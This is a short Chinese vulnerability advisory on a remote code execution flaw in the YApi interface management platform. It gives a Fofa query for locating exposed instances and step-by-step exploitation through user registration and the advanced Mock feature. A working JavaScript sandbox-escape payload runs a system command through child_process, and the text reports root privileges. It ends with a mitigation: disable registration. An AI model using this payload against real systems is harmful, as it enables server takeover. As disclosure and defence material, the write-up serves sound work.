漏洞描述
YApi接口管理平台遠程代碼執行0day漏洞,攻擊者可通過平台注冊用戶添加接口,設置mock腳本從而執行任意代碼。鑒於該漏洞目前處於0day漏洞利用狀態,強烈建議客戶盡快采取緩解措施以避免受此漏洞影響
Fofa
app="YApi"
1.主界面
2.默認開啟注冊功能,注冊新用戶
3.點擊加號新建項目
4.添加接口
5.選擇高級Mock-》開啟-》寫入POC
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
6.進入預覽,點擊Mock地址鏈接
7.查看結果權限為root
解決方案
Yapi作者已經停止更新。臨時修復建議禁止用戶注冊,具體配置參考原文鏈接:
https://hellosean1025.github.io/yapi/devops/index.html#禁止注冊